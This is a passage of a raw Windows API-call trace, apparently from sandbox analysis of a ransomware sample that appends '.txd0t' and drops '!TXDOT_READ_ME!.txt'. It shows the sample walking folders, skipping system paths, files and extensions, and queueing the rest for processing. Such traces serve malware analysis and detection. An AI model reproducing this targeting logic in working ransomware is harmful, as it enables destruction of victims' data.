psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.442] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.442] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.442] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.442] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0085.442] GetProcessHeap () returned 0xe30000 [0085.442] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.442] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1030", cAlternateFileName="")) returned 1 [0085.442] StrCmpW (psz1="1030", psz2=".") returned 1 [0085.442] StrCmpW (psz1="1030", psz2="..") returned 1 [0085.443] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.443] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.443] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1030", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system32\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\local\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\boot\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\perflogs\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\programdata\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\drivers\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\wsus\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="crypt_detect") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="cryptolocker") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="ransomware") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\WINDOWS") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.443] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files") returned 0x0 [0085.443] GetProcessHeap () returned 0xe30000 [0085.443] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.443] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0085.443] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\*") returned="C:\\588bce7c90097ed212\\1030\\*" [0085.443] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0085.444] StrCmpW (psz1=".", psz2=".") returned 0 [0085.444] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.444] StrCmpW (psz1="..", psz2=".") returned 1 [0085.444] StrCmpW (psz1="..", psz2="..") returned 0 [0085.444] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.444] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.444] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.444] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0085.444] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0085.444] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="C:\\588bce7c90097ed212\\1030\\eula.rtf" [0085.444] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.444] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.444] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.444] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.444] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.444] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.447] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.447] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1030\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" [0085.447] SetEvent (hEvent=0x418) returned 1 [0085.447] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.447] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.447] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.447] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0085.448] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0085.448] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0085.448] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.448] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.448] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.448] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.448] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.448] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.479] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.479] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0085.479] SetEvent (hEvent=0x418) returned 1 [0085.480] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.480] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.480] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.481] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0085.481] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0085.481] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" [0085.481] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.481] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.481] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.482] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.486] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.486] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.486] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.486] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.486] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.486] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.486] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.486] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.486] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.486] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0085.486] GetProcessHeap () returned 0xe30000 [0085.486] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.486] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0085.486] StrCmpW (psz1="1031", psz2=".") returned 1 [0085.486] StrCmpW (psz1="1031", psz2="..") returned 1 [0085.486] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.486] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.486] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1031", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system32\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\local\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\boot\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\perflogs\\") returned 0x0 [0085.486] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\programdata\\") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\drivers\\") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\wsus\\") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="crypt_detect") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="cryptolocker") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="ransomware") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\WINDOWS") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.487] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files") returned 0x0 [0085.487] GetProcessHeap () returned 0xe30000 [0085.487] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.487] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0085.487] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\*") returned="C:\\588bce7c90097ed212\\1031\\*" [0085.487] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0085.487] StrCmpW (psz1=".", psz2=".") returned 0 [0085.487] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.487] StrCmpW (psz1="..", psz2=".") returned 1 [0085.487] StrCmpW (psz1="..", psz2="..") returned 0 [0085.487] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.487] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.487] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.487] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0085.487] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0085.487] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="C:\\588bce7c90097ed212\\1031\\eula.rtf" [0085.487] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.487] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.487] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.487] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.487] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.488] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.488] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.488] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.488] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.488] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.488] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1031\\eula.rtf", cchMax=32000 | out: 